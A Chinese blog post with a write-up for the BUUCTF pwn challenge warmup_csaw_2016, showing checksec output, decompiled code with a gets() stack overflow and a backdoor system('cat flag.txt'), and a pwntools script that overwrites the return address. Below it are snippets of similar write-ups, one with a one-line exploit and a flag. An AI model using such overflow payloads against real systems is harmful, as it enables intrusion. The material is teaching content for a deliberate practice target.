BUU刷题-Pwn-warmup_csaw_2016

最新推荐文章于 2023-08-01 21:54:00 发布
原创 最新推荐文章于 2023-08-01 21:54:00 发布 · 143 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章分析了一个64位的LinuxELF程序,该程序存在栈溢出漏洞,由于没有栈Canary、NX保护和RELRO,可以通过溢出修改返回地址,调用后门函数`sub_40060D`,该函数使用`system`执行`catflag.txt`命令获取flag。利用`sprintf`的格式化字符串漏洞,可以控制输入,进一步利用栈溢出。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:无需
  3. libc地址:无需
  4. BSS段地址:无需
    劫持程序执行流程:[[ret2libc(栈溢出调用任意函数)]]
    获得shell或flag:[[劫持返回地址]] && [[调用程序中的system]]
学到的知识:

[[sprintf()]]

题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file warmup_csaw_2016           
warmup_csaw_2016: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7b7d75c51503566eb1203781298d9f0355a66bd3, stripped
                                                                                                                     
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=warmup_csaw_2016
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified    Fortifiable     FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   No Symbols        No    0   2warmup_csaw_2016

libc版本:
wp借鉴:

核心伪代码分析:

存在利用的的代码:

int sub_40060D()
{
  return system("cat flag.txt");
}

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
  char v5[64]; // [rsp+40h] [rbp-40h] BYREF

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(s, "%p\n", sub_40060D);
  write(1, s, 9uLL);
  write(1, ">", 1uLL);
  return gets(v5);
}
分析:

分析:有后门函数,利用栈溢出

发现后门函数:

.text:000000000040060D sub_40060D      proc near       ; DATA XREF: main+34↓o
.text:000000000040060D ; __unwind {
.text:000000000040060D                 push    rbp
.text:000000000040060E                 mov     rbp, rsp
.text:0000000000400611            mov     edi, offset command ; "cat flag.txt"
.text:0000000000400616                 call    _system
.text:000000000040061B                 pop     rbp
.text:000000000040061C                 retn
.text:000000000040061C ; } // starts at 40060D

发现v5变量距离ebp+8=0x40+8

-0000000000000040 var_40          db 64 dup(?)
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

同时存在危险函数get(),可以实现栈溢出漏洞!

脚本:
from pwn import *
context(log_level='debug',arch='amd64',os='linux')

pwnfile='./warmup_csaw_2016'
sh=remote('node4.buuoj.cn',29734)
#sh=process(pwnfile)

backdoor_addr=0x40060d


payload=(0x40+8)*b'a'+p64(backdoor_addr)

#sh.recvuntil("please input")

#gdb.attach(sh)
#pause()

sh.sendline(payload) 

sh.interactive()
关于buu warmup的深入理解
qq_51425032的博客
05-19 543
关于buu warmup的深入理解 打开页面,一个滑稽,查看源码,得到source.php,输入得到源码: <?php //首先测试一下in_array()函数的绕过方法 //$str=["heel","zzy"]; //var_dump(in_array("heel?f",$str)); highlight_file(__FILE__); class emmm { public static function checkFile(&$page)
buuctf 之warmup_csaw_2016
最新发布
weixin_54452942的博客
03-25 571
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
CTF buuoj pwn-----第3:warmup_csaw_2016
bing_Max的博客
08-29 1984
CTF buuoj pwn-----第3:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 566
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
BUU_warm_up
qq_46635165的博客
09-25 318
考察点:远程文件包含利用漏洞 打开目网址,提示代码审计,直接审查源码: 访问source.php,得到源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 425
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 726
笔记
【CTF解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1577
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
buu pwn——分类型1——gets溢出无脑填充
苗_的博客
09-07 1398
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
BUUOJ PWN 61-80
2h4ox1n9
12-17 355
61\
[BUUCTF]pwn栏目 warmup_csaw_2016 1的解和小疑问,欢迎讨论
XDiku的博客
11-01 1470
[BUUCTF]pwn栏目 warmup_csaw_2016 1的解和小疑问,欢迎讨论
BUU-warmup_csaw_2016
qq_45771413的博客
04-27 239
查看保护 啥都没保护[滑稽] IDA 很明显的gets输入漏洞,撑爆v5即可 cat flag也很贴心地加了system…… EXP from pwn import * p=remote('node3.buuoj.cn',25059) p.sendline('A'*64+'a'*8+p64(0x400611)) p.interactive() flag flag{cda4b354-70c5-4017-bc79-df3428ae7722} ...
【学习笔记8】buu [HCTF 2018]WarmUp
weixin_43553654的博客
05-06 244
1.点开一看发现一个表情包,f12查看源码发现提示让去找source.php页面,转到source.php页面后看到如下代码,日常代码审计,再看其中提到了hint.php,接下来跳转到hint.php看,提示flag not here, and flag in ffffllllaaaagggg <?php highlight_file(__FILE__);//指定地址 cla...
buuctf--pwn-warmup
weixin_45427676的博客
09-19 584
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
buu:pwn warmup_csaw_2016
weixin_60553183的博客
11-29 2673
buu:pwn warmup_csaw_2016 第一次写pwn,得到文件放入ida 其实一开始和re的很像,都是寻找关键函数,怎么找,个人理解是要关注输入输出有无比较的地方,这里shb_40060D很明显就是关键函数,点进去,为什么呢,因为gets()函数很明显会有栈溢出漏洞,sub_40060D函数是后门。 找到了system和 cat flag.txt。 进入虚拟机,对文件进行checksec操作 发现没有任何防护 写exp 在终端运行得flag. ...
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 189
BUUCTF 做练习
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 507
64位的linux文件。
[BUUCTF]PWN——[V&N2020 公开赛]warmup
mcmuyanga的博客
11-17 552
[V&N2020 公开赛]warmup 步骤: 例行检查,64位程序,除了canary,其他保护都开 本地运行一下,看看大概的情况 64位ida载入,从main函数开始看程序 看到程序将puts函数的地址泄露给了我们 sub_84D()函数里面是prctl函数的沙箱机制 可以利用seccomp-tools工具来查看一下限制了哪些函数 禁止了execve和fork syscall, 关于seccomp-tools工具的安装和使用看这篇文章,关于prctl函数可以看一下这篇文章
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 590
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值